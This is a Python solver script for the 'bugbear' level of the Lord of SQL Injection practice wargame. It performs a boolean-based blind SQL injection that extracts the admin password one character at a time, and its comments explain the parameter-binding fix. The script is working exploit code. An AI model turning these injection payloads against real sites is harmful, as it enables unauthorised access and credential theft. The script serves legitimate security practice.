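"""Solver for the Lord of SQL Injection "bugbear" practice challenge.

The script performs a boolean-based blind extraction: every request places a
condition in the ``no`` parameter and the only signal read back is whether
the response contains "Hello admin".  It first finds the length of the
admin row's ``pw`` column, then resolves it one character at a time.

Reviewer notes:
* The server side is not shown here; presumably ``no`` is concatenated into
  the SQL text.  Binding it as a query parameter (or casting it to an
  integer) removes the oracle; a keyword blacklist does not.
* The traffic is noisy: up to 100 length probes plus up to 75 requests per
  character, all with near-identical ``no`` values, which stands out in
  access logs.
"""
import requests

password = ''
password_length = 0
URL = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
# Placeholder: the session cookie of your own wargame account goes here.
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}

# Seconds to wait per request; without a timeout a stalled connection would
# block the script forever.
REQUEST_TIMEOUT = 10

# Text the page shows when the injected condition selected the admin row.
SUCCESS_MARKER = "Hello admin"

# Restricts the match to the row whose id starts with "admin", written as a
# range comparison ("admim" < left(id,5) < "admio").
ADMIN_ROW_FILTER = '1||left(id,5)<"admio"&&left(id,5)>"admim"'


def _condition_holds(no_value):
    """Send one probe and return True when the success marker is in the reply."""
    query = {'pw': '1', 'no': no_value}
    res = requests.get(
        URL,
        params=query,
        headers=headers,
        cookies=cookies,
        timeout=REQUEST_TIMEOUT,
    )
    return SUCCESS_MARKER in res.text


# Step 1: length(pw) < n first becomes true at n = length + 1.
for estimated_length in range(100):
    if _condition_holds(
        '{}&&length(pw)<{}'.format(ADMIN_ROW_FILTER, estimated_length)
    ):
        password_length = estimated_length - 1
        print("admin's password length is {}".format(password_length))
        break

if password_length < 1:
    # Also reached when the session cookie is missing or expired, because the
    # marker then never appears.
    print("Password length unknown")
    raise SystemExit(1)

# Step 2: for each position, the first candidate that compares greater than
# the stored character is one code point above it.
for current_password_length in range(1, password_length + 1):
    for password_chr in range(ord('0'), ord('z') + 1):
        probe = '{}&&right(left(pw,{}),1)<"{}"'.format(
            ADMIN_ROW_FILTER, current_password_length, chr(password_chr)
        )
        if _condition_holds(probe):
            password = password + chr(password_chr - 1)
            print(password)
            break
    else:
        # No candidate compared greater, so the character lies outside the
        # scanned range (the strict "<" test cannot confirm the last
        # candidate either).  Stop instead of continuing with a result that
        # is silently one character short.
        print("No match at position {}; result is incomplete".format(
            current_password_length))
        raise SystemExit(1)

if len(password) == password_length:
    # Both cases are printed, presumably because the database comparison is
    # case-insensitive and cannot tell them apart.
    print("Got it. Password is {} or {}.".format(
        password.upper(), password.lower()))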